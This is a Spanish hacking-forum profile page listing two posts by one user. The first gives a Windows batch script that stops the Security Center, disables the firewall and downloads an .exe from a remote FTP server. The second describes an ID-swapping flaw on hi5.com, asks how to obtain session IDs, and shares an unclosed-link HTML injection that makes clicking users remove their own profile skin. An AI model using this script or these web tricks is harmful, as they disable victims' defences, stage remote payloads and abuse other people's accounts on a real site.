Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - McArthur

#1
Scripting / ftp en batch
27 Diciembre 2008, 02:48 AM
Hola, bueno... me diran que este post es repetido y que busque en el foro, pero ya lo hize...  el problema es que necesito descargar un archivo desde un ftp con un script en batch, lo que tengo es asi:

@echo off
Net stop "Centro de Seguridad"
netsh firewall set opmode mode = DISABLE
pushd %userprofile%
echo esto bajara todo el contenido del ftp
echo usuario>ftp.txt
echo contraseña>>ftp.txt
echo mget "archivo.exe">>ftp.txt
echo bye>>ftp.txt
echo quit>>ftp.txt
ftp -s:ftp.txt ftp.servidor.net
exit


mmmm, ok... desactiva correctamente el firewall.. el centro de seguridad; supuestamente se conecta, se loguea correctamente, pero justo cuando esta descargando, y pasa a "binary" pum... se cae... y no descarga nada  :huh: no entiendo porque... :S si alguien me pudiera ayudar, se lo agradeceria...

:)
#2
Nivel Web / Vulnerabilidades en Hi5
17 Febrero 2008, 19:55 PM
Recientemente he estado investigando ciertas Vulnerabilidades en el sitio http://www.hi5.com, y resulta que son muchas, (para ser exactos nunca habia conocido un sitio tan grande con tantos errosres y bugs) bien, una de las vulnerabilidades mas absurdas que encontre fue la siguiente:

al poner en la barra de direcciones: http://www.hi5.com/friend/photos/displayUserAlbum.do?ownerId=114167919&albumId=133136166 se podia acceder al sistema de upload de imagenes de el owner (por lo que la variable a cambiar solo era ese Id) sin embargo el bug fue solucionado realmente rapido, solo un par de dias despues de ser descubierto....agregaron una varible mas: "jsessionid=" si alguno supiera como ibtenerlo, seria de mucha utilidad gracias...

Para evitar dejar un mensaje donde solo pido, dejare un bug que no han solucionado en hi5....

Codigo:<a href="/friend/profile/removeSkin.do" name="&lid=MyProfile_RemoveSkin">

Accion: El enlace, en vez de tener la forma tradicional, al no cerrar la etiqueta con </a> esta se cierra con el boton, por lo que el enlace de acopla al mismo y  remueve el tapiz del usuario que lo pulse...espero haberme explicado...

Extras: bien, este es solo un ejemplo poco dañiño...solo removera el skin del usuario, pero este mismo cadigo se puede insertar en muchas otras partes de hi5, (comentarios, etc) y se pude modificar para buscarle una utilidad mas....mmm interesante pod decir algo  ;)....Salu2  >:D >:D >:D